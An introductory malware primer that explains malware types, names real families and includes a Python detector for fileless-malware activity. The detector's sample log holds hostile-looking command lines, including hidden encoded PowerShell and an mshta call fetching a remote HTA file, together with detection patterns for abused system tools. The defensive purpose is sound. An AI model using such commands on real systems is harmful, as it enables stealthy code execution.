Gain a better understanding of what malware is, what it isn't, and how you can prevent and detect its presence in your environment before the crown jewels are compromised.
In this 101, we’re going to cover:
Malware refers to any piece of software developed with the intent of causing harm to a computer, program, device, or user. The developer's purpose is central to the definition, as many software programs can cause unintended damage if misused. Malware is different because malicious actors explicitly design these programs to infiltrate systems and damage or disable their functionality.
Common motives for creating malware typically involve making money, with cybercriminals leveraging stolen computer resources or data for profit. Malware can also be part of a coordinated attack, from state actors infiltrating government or corporate systems to steal technology, proprietary information, or actionable intelligence or disable critical systems like power and communications technology.
Malware stands for malicious software and acts as a collective term that includes several variants. Viruses, trojans, worms, ransomware, and unauthorized spyware are all considered malware.
Even though malware includes various malicious tools and techniques, the attack patterns are broadly consistent. Typically, a malware attack begins when a user unknowingly installs malware on an endpoint device, delivered by email, a USB drive, or a download. Some malware can spread without any direct installation by the user. Drive-by download attacks, for example, infect a device when the user merely visits a website and require no further action from the user.
There are many ways that users get exposed to malware. Social engineering attacks like phishing and spear-phishing are common, with malicious software hidden within an email attachment. Peer-to-peer file-sharing services and illegal streaming activity also regularly deliver malware to unsuspecting users.
Cybercriminals and the attacks they perpetrate become more sophisticated every year. Here are a few examples of the most common categories of malware:
Viruses have long been the most common and well-known form of malware. Viruses infect legitimate executable binaries so that the malicious code runs whenever the infected program runs. Similar to their biological counterparts, what makes viruses so dangerous is how quickly they can spread between systems. That quick spread often results in corrupted files and programs or total system lockouts.
Ransomware attacks typically work by infecting systems containing valuable or compromising information. The malware seeks out critical data and encrypts it, denying the system owner access to their data. Successful ransomware attacks can have a tremendous impact on individuals and organizations, resulting in embarrassing data leaks, theft, and privacy breaches.
Trojan Horses are malware that disguise themselves as a trusted or legitimate program to trick users into executing their malicious code.
Worms are a unique form of malware with the capability to self-replicate. These programs duplicate themselves to infect other systems in the network.
Rather than relying on executable binary files, fileless malware abuses legitimate tools built into the operating system to conduct its attacks.
Since most malware infections occur from virus downloads or malicious links in email communications, anti-virus software and email security are the most reliable malware detection methods. However, as malware and cyberattacks in general continue to become more sophisticated, many individuals and organizations find that traditional security software is insufficient to counter the latest threats. Many companies turn to robust Extended Detection and Response (XDR) capabilities powered by AI and machine learning to detect and counter emerging, zero-day vulnerabilities.
There are also some warning signs that users and system administrators can observe on their systems that may signal a malware infection. Users should be wary of unwanted popups or if unknown programs appear on the device. Unusual network or hardware performance could indicate that unauthorized software is hogging system resources.
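The fileless-malware pattern (built-in OS tools abused in place of a dropped binary) and the "unknown program appears on the device" warning sign above can both be turned into detection logic over process-creation telemetry. The following is an added example, not code from the original article; the log lines, the trusted-directory baseline and the rule names are all constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (illustrative, not real telemetry).
# Fields: timestamp|host|parent_image|image|command_line
SAMPLE_EVENTS = """\
2024-01-01T09:00:01|ws01|C:\\Windows\\explorer.exe|C:\\Program Files\\Vendor\\app.exe|app.exe
2024-01-01T09:00:05|ws01|C:\\Program Files\\Microsoft Office\\WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -nop -w hidden -enc AAAA
2024-01-01T09:01:10|ws01|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\mshta.exe|mshta.exe http://example.invalid/page.hta
2024-01-01T09:02:00|ws01|C:\\Windows\\System32\\services.exe|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs
2024-01-01T09:03:00|ws01|C:\\Windows\\explorer.exe|C:\\Users\\alice\\AppData\\Local\\Temp\\update_7a.exe|update_7a.exe
"""

# Built-in OS tools that fileless malware commonly repurposes ("living off the land").
LOLBINS = {"powershell.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe"}
# Parents that should rarely spawn a scripting host directly: document readers and browsers.
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "acrord32.exe", "chrome.exe", "msedge.exe"}
# Hypothetical baseline: where approved programs live on this host, and user-writable locations.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\")

@dataclass
class Finding:
    timestamp: str
    rule: str
    image: str

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def analyze(events: str) -> list[Finding]:
    """Return one Finding per matched rule, in event order."""
    findings = []
    for line in events.splitlines():
        ts, _host, parent, image, cmd = line.split("|", 4)
        name, parent_name, cmd_l, image_l = basename(image), basename(parent), cmd.lower(), image.lower()
        # Fileless: a document viewer or browser launching a scripting host.
        if name in LOLBINS and parent_name in DOCUMENT_PARENTS:
            findings.append(Finding(ts, "lolbin-spawned-by-document-app", name))
        # Fileless: PowerShell hiding its window or taking an encoded command.
        if name == "powershell.exe" and re.search(r"(^|\s)-(e|enc|encodedcommand)\b|-w(indowstyle)?\s+hidden", cmd_l):
            findings.append(Finding(ts, "powershell-encoded-or-hidden", name))
        # Fileless: an OS tool pulling content straight from a URL.
        if name in LOLBINS and re.search(r"https?://", cmd_l):
            findings.append(Finding(ts, "lolbin-remote-payload", name))
        # Warning sign: an unknown program running from a user-writable directory.
        if not image_l.startswith(TRUSTED_DIRS) and any(d in image_l for d in USER_WRITABLE):
            findings.append(Finding(ts, "unknown-program-user-writable-dir", name))
    return findings
```

On the constructed sample, the Office-spawned PowerShell event triggers two rules, the mshta event one, and the executable under Temp one, while the vendor application and svchost produce nothing.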
Here are a few examples of real-world malware programs:
TrickBot is a Trojan spyware program originating in 2016, used recently in several attacks targeting the financial sector.
Anchor is a newer form of malware that has been in operation since 2018. This TrickBot malware extension adds a new and enhanced stealing module that steals passwords from password-management software.
Snake is feature-rich information-stealing malware with keystroke logging, clipboard capture, screenshot, and credential theft capabilities.
Recent research uncovered a new malware strain acting as a dropper targeting .NET code. A dropper is a Trojan Horse designed to install other malware on a device. The particular dropper discovered in the research also contained a peculiar yet troublesome capability to disable research tools, making it harder to detect with tools like Wireshark.
When users suspect malware infected their system, they should immediately acquire and run anti-malware software to scan their system and detect any present threats. Once the anti-malware software cleans the system and isolates the threat, users should update their passwords and ensure their email and essential accounts are not compromised.
Users should consider implementing automated detection and response capabilities to help shut down malware attacks before critical systems become infected.